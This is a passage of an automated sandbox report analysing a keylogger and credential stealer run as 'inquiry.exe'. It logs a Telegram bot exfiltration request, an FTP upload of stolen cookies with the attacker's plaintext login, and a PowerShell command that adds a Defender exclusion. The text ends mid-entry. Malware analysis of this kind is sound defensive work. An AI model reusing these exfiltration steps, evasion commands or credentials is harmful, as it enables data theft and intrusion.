2024-09-25 16:50:35 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 16:50:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49731	188.114.96.3	443	7860	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:50:42 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-25 16:50:42 UTC	680	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:50:42 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 35101 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fPMXJo5QJwJxtBok5I5RfkiTF%2BCifPZfneGAr8Fd7OS3rk2zs54rvui7AK1KZoWq5OZNqAr2m%2BeJPqXj%2BZXv828YnJXTj4v5%2BMsjqIuRC39yfpQLdP5pPfwXFyD7b8VXma%2BX7Ry4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8c83c8b97dc459-EWR
2024-09-25 16:50:42 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 16:50:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49732	149.154.167.220	443	7860	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:50:43 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2026/09/2024%20/%2003:21:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-09-25 16:50:43 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Wed, 25 Sep 2024 16:50:43 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-25 16:50:43 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Sep 25, 2024 18:50:51.631582975 CEST	21	49734	192.64.117.204	192.168.2.7	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 45 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 45 allowed.220-Local time is now 12:50. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 45 allowed.220-Local time is now 12:50. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 45 allowed.220-Local time is now 12:50. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 45 allowed.220-Local time is now 12:50. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Sep 25, 2024 18:50:51.631845951 CEST	49734	21	192.168.2.7	192.64.117.204	USER august@fastestpay.digital
Sep 25, 2024 18:50:51.800518990 CEST	21	49734	192.64.117.204	192.168.2.7	331 User august@fastestpay.digital OK. Password required
Sep 25, 2024 18:50:51.800785065 CEST	49734	21	192.168.2.7	192.64.117.204	PASS 1Qj;XlmD!Lrj
Sep 25, 2024 18:50:52.144313097 CEST	21	49734	192.64.117.204	192.168.2.7	230 OK. Current restricted directory is /
Sep 25, 2024 18:50:52.426245928 CEST	21	49734	192.64.117.204	192.168.2.7	504 Unknown command
Sep 25, 2024 18:50:52.426471949 CEST	49734	21	192.168.2.7	192.64.117.204	PWD
Sep 25, 2024 18:50:52.632359028 CEST	21	49734	192.64.117.204	192.168.2.7	257 "/" is your current location
Sep 25, 2024 18:50:52.632617950 CEST	49734	21	192.168.2.7	192.64.117.204	TYPE I
Sep 25, 2024 18:50:52.809649944 CEST	21	49734	192.64.117.204	192.168.2.7	200 TYPE is now 8-bit binary
Sep 25, 2024 18:50:52.809813976 CEST	49734	21	192.168.2.7	192.64.117.204	PASV
Sep 25, 2024 18:50:52.985399008 CEST	21	49734	192.64.117.204	192.168.2.7	227 Entering Passive Mode (192,64,117,204,47,12)
Sep 25, 2024 18:50:52.991204977 CEST	49734	21	192.168.2.7	192.64.117.204	STOR 494126 - Cookies ID - ZyiAEnXWZP1275365848.txt
Sep 25, 2024 18:50:53.527370930 CEST	21	49734	192.64.117.204	192.168.2.7	150 Accepted data connection
Sep 25, 2024 18:50:53.700197935 CEST	21	49734	192.64.117.204	192.168.2.7	226-File successfully transferred 226-File successfully transferred226 0.174 seconds (measured here), 5.80 Kbytes per second

Target ID:	2
Start time:	12:50:15
Start date:	25/09/2024
Path:	C:\Users\user\Desktop\inquiry.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\inquiry.exe"
Imagebase:	0x1f8698b0000
File size:	1'399'327 bytes
MD5 hash:	E645B187588A20E886416884000446DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:50:19
Start date:	25/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:50:19
Start date:	25/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:50:19
Start date:	25/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Imagebase:	0x6c0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.3761177777.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	12:50:19
Start date:	25/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Imagebase:
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	12:50:20
Start date:	25/09/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7340 -s 1312
Imagebase:	0x7ff7c03a0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:50:29
Start date:	25/09/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFAACC091B0 Relevance: 7.1, Strings: 5, Instructions: 878
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x!, xrefs: 00007FFAACC0D66B
0#, xrefs: 00007FFAACC0D873
0#, xrefs: 00007FFAACC0D8CE
:S_E, xrefs: 00007FFAACC0D7EE
0#, xrefs: 00007FFAACC0D85C

Memory Dump Source

Source File: 00000002.00000002.1514018131.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacc00000_inquiry.jbxd

Similarity

API ID:
String ID: 0#$0#$0#$:S_E$x!
API String ID: 0-2710069457
Opcode ID: d41f54e7ab7ec70bf1fc5bea67796d849ccc8701d3ebc27d42967f143c66e9da
Instruction ID: 68e7438b0b21785fcf7ace82a8e7eaa8c2f8f801d4e9774812e64d5395b41bd8
Opcode Fuzzy Hash: d41f54e7ab7ec70bf1fc5bea67796d849ccc8701d3ebc27d42967f143c66e9da
Instruction Fuzzy Hash: 7742B630A09A099FEBA8DF2CD455B7977E1EF5A301F1441BEE44EC7292DE24EC468781

Function 00007FFAACCD0001 Relevance: 2.3, Instructions: 2295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1514353488.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaaccd0000_inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 949399da79addafa20f79f977a794672db3f20f17648a4cb2e02db85076c2ad6
Instruction ID: 097d9c4534494fdd61ef17f25ce690da40880a89306cd4b1ab95a60ec7576833
Opcode Fuzzy Hash: 949399da79addafa20f79f977a794672db3f20f17648a4cb2e02db85076c2ad6
Instruction Fuzzy Hash: 09E2067290E7868FF756DB2888556A47FE0EF56310F0941FFD08DCB192DA28A85AC7C1

Function 00007FFAACC033D0 Relevance: 2.0, Strings: 1, Instructions: 731
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 00007FFAACC04D5F

Memory Dump Source

Source File: 00000002.00000002.1514018131.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacc00000_inquiry.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 81b4afd858a12ca477d68213cb0bf61381d16cf83ad6113273786d3923d4dbde
Instruction ID: 2f2d6f42531e6122d62bfd5809bac74d64d49cb1d7e99a88bb4ddd156b11008a
Opcode Fuzzy Hash: 81b4afd858a12ca477d68213cb0bf61381d16cf83ad6113273786d3923d4dbde
Instruction Fuzzy Hash: 2322557191DA498FE789DF28D4859B277E1EF82310B1482B9D49EC7197EE28E847C7C0

Function 00007FFAACC0BF51 Relevance: 1.3, Instructions: 1285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1514018131.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacc00000_inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e80a3280c52dbd907c784d0cfad602575c9edf6a8d6726ce0e426f3b740610b
Instruction ID: eb81b6d660c9e3406f06133503877129178d32ca53b7aed94411a55eb6cb6a16
Opcode Fuzzy Hash: 1e80a3280c52dbd907c784d0cfad602575c9edf6a8d6726ce0e426f3b740610b
Instruction Fuzzy Hash: 8692453051DB4A8FE359DF28C4944B5B7E1FF86305B1485BEE48EC72A6DA34E84AC781

Function 00007FFAACC044A0 Relevance: 1.1, Instructions: 1133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1514018131.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacc00000_inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f008b99d0dbdf6a9822416581882c4fbabc1d6aa338cc0201dd5a4b25640532
Instruction ID: 10312a507fb136a3810490d734f6cf6d3c333bb35efe74f668f26eebe1796c5d
Opcode Fuzzy Hash: 0f008b99d0dbdf6a9822416581882c4fbabc1d6aa338cc0201dd5a4b25640532
Instruction Fuzzy Hash: 8382347190EA868FF7598F2584516B47BE1EF96310F1481BDD48E8B5D3DA28EC4ACBC0

Function 00007FFAACC04671 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1514018131.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacc00000_inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 242bb13d5a1556c9b45371cb77e7b6170f3a4d72c8a47a71623be0afd4af25a3
Instruction ID: 89bdc17787b72433da6830fa53a053552e4aa29f6845bdf842a2d2eed72b4c21
Opcode Fuzzy Hash: 242bb13d5a1556c9b45371cb77e7b6170f3a4d72c8a47a71623be0afd4af25a3
Instruction Fuzzy Hash: 8D71F771A1CA499FE79CEF28D4554BAB3E1FF96310B00453EE48FC3592EE24E8468681

Function 00007FFAACC14B24 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1514018131.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacc00000_inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd9081d25d859b3974d26adb9bb52ba8ce3e4a0c01370f1822df27daab1016b5
Instruction ID: e258a7fcdb072e1d38449b663fb582d77d030f92de4a2372b212b62707751a9a
Opcode Fuzzy Hash: dd9081d25d859b3974d26adb9bb52ba8ce3e4a0c01370f1822df27daab1016b5
Instruction Fuzzy Hash: 7D417B7160D64D4FE71D9E38881A1B53B95EB43220B15C27FE48BC76A3DD18D84783D1

Function 00007FFAACC031B9 Relevance: 1.6, APIs: 1, Instructions: 124
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFAACC03261

Memory Dump Source

Source File: 00000002.00000002.1514018131.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacc00000_inquiry.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e19b51230b35b1469a37401dc7b5c8b94358c1778f38299af62dcb7fe251be18
Instruction ID: 68d0ec0ce37b6585a45f9541dfe914a47afda0f8a45e611c93dee0c3864fdf6b
Opcode Fuzzy Hash: e19b51230b35b1469a37401dc7b5c8b94358c1778f38299af62dcb7fe251be18
Instruction Fuzzy Hash: 5631077190CA4C8FDB18DF9CD8456F97BE1EF96311F04422FD049C3592CB646846CB81

Function 00007FFAACC0974B Relevance: 1.6, APIs: 1, Instructions: 113
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFAACC184E1

Memory Dump Source

Source File: 00000002.00000002.1514018131.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacc00000_inquiry.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 94066727a0b53ff4169215f9628cf97dfd847ba517b406a198f1b914ebbc9dd3
Instruction ID: 8c4b4489eb9b9967c48df266f4a05f2a64786c61b8c0d24a9e065dac2f3185f8
Opcode Fuzzy Hash: 94066727a0b53ff4169215f9628cf97dfd847ba517b406a198f1b914ebbc9dd3
Instruction Fuzzy Hash: 8231E77090CA0C8FDB18DF9DD8496F9B7E1EB69311F00422FD04AD3652DF70A8468791

Function 00007FFAACCD10C9 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1514353488.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaaccd0000_inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0187a023facadbef601d867f42e45d16b2fb84625adbc9ccff7d48461bc9fbc
Instruction ID: 5a0cddf3d886d829cbd8bf40e1dcb45389f634bfcf85500b5573307be768cd46
Opcode Fuzzy Hash: d0187a023facadbef601d867f42e45d16b2fb84625adbc9ccff7d48461bc9fbc
Instruction Fuzzy Hash: 8671247190DB8A8FEB57DF68C8566A57BE0EF56310B0541FBD04EC7193EE29A819C380

Function 00007FFAACCD1210 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1514353488.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaaccd0000_inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab08da649075e7e9a93b44b52337982b0fb5c363b6ea3393a6bfd8662b41d63d
Instruction ID: d1871ad0914fd1c7f8f6dbb10a3a19c5fa84f04747a4246f41fd08cd8608bb3e
Opcode Fuzzy Hash: ab08da649075e7e9a93b44b52337982b0fb5c363b6ea3393a6bfd8662b41d63d
Instruction Fuzzy Hash: 5D31FF31908A4E8FEB5AEF18D8566B87BE0FF65320F14427AD04EC3581EE21E86583C0

Analysis Process: MSBuild.exePID: 7860, Parent PID: 7340COMMON

Execution Graph

Execution Coverage:	11.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	11
Total number of Limit Nodes:	2

Executed Functions

Function 01036FC8 Relevance: 6.7, Strings: 5, Instructions: 469
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oq, xrefs: 01037220
(oq, xrefs: 0103753D
(oq, xrefs: 01037212
,q, xrefs: 0103728A
,q, xrefs: 01037298

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$,q$,q
API String ID: 0-189141485
Opcode ID: 3329fdd261d649b988c2a0709af9946a6845fab1f4c7682755cc5479702ac823
Instruction ID: e0e995e295a415cc0c4530a3ca3b182221c3ff28ad38915bdb2afc9a9603de7d
Opcode Fuzzy Hash: 3329fdd261d649b988c2a0709af9946a6845fab1f4c7682755cc5479702ac823
Instruction Fuzzy Hash: 881272B1A00209DFDB55CF69C884AADBBF6FF89300F1584A9E985AB261D734ED41CF50

Function 01039DE0 Relevance: 6.1, Strings: 4, Instructions: 1139COMMON

Download Yara Rule

Strings

(oq, xrefs: 0103A518
4'q, xrefs: 0103AB13
4'q, xrefs: 01039E04
4'q, xrefs: 01039F0C

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID: (oq$4'q$4'q$4'q
API String ID: 0-2528434116
Opcode ID: dcd0679dd4b38801d6b9de1c0d6b6a4f8055e533038b5ec65140d0a69bd3bdcc
Instruction ID: 047992687a7638e58dc5368f9ea499b7c1f12ea4b78c2324a2a35978f7837955
Opcode Fuzzy Hash: dcd0679dd4b38801d6b9de1c0d6b6a4f8055e533038b5ec65140d0a69bd3bdcc
Instruction Fuzzy Hash: 87A29F71B04609CFCB15CFA8C584AAEBBFABFC8300F158559E585DB266D731E942CB50

Function 010329EC Relevance: 5.5, Strings: 4, Instructions: 490
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xq, xrefs: 01032AD8
Xq, xrefs: 01032A9E
Xq, xrefs: 01032BA4
Xq, xrefs: 01032B57

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID: Xq$Xq$Xq$Xq
API String ID: 0-3965792415
Opcode ID: cbfb9058e7ebce28cda31121bcfa4a263e3844e4740e096692210006e55e4d97
Instruction ID: 55b05b321fc40cab5b1018d6ba0470acdd1c7557fd48c0abf721b229d6a7abb4
Opcode Fuzzy Hash: cbfb9058e7ebce28cda31121bcfa4a263e3844e4740e096692210006e55e4d97
Instruction Fuzzy Hash: 4C02BF329047948FCB62CF78C8D279ABBF4FF4A314B1888DEC485CA616D735A815DB52

Function 010369A0 Relevance: 3.0, Strings: 2, Instructions: 516COMMON

Download Yara Rule

Strings

(oq, xrefs: 01036EDA
Hq, xrefs: 01036DA6

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID: (oq$Hq
API String ID: 0-2917151738
Opcode ID: 93186d5c49ca32368fbed33f0ecc9d93d7ef4f5bccd1a71d580607a4d188f74d
Instruction ID: 024880d4aea493edd3846f15b74b0bb1e0ce6d6e4e8464a7420c032bb6bb40ea
Opcode Fuzzy Hash: 93186d5c49ca32368fbed33f0ecc9d93d7ef4f5bccd1a71d580607a4d188f74d
Instruction Fuzzy Hash: CA128E70A002199FDB14DF69C894BAEBBF6BFC8300F148569E5469B395DB319E42CB90

Function 01033AA1 Relevance: 2.8, Strings: 2, Instructions: 310
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xq, xrefs: 01033CCD
Xq, xrefs: 01033CF6

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID: Xq$Xq
API String ID: 0-1556399337
Opcode ID: aed355c51f343d220dad8fb36c365c92827af8385c83fc95a16c33b1f36ab02c
Instruction ID: e0789faf91c603a745ebc5a591f4fd1f2120a271f978221f135c161bf58c6755
Opcode Fuzzy Hash: aed355c51f343d220dad8fb36c365c92827af8385c83fc95a16c33b1f36ab02c
Instruction Fuzzy Hash: 1FA1A2326097A18FCB668F78D8D67567BF5FF4322470884EDC482CE61AD6389805DB53

Function 01033E09 Relevance: 2.8, Strings: 2, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 01033E2E
Xq, xrefs: 01033E47

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

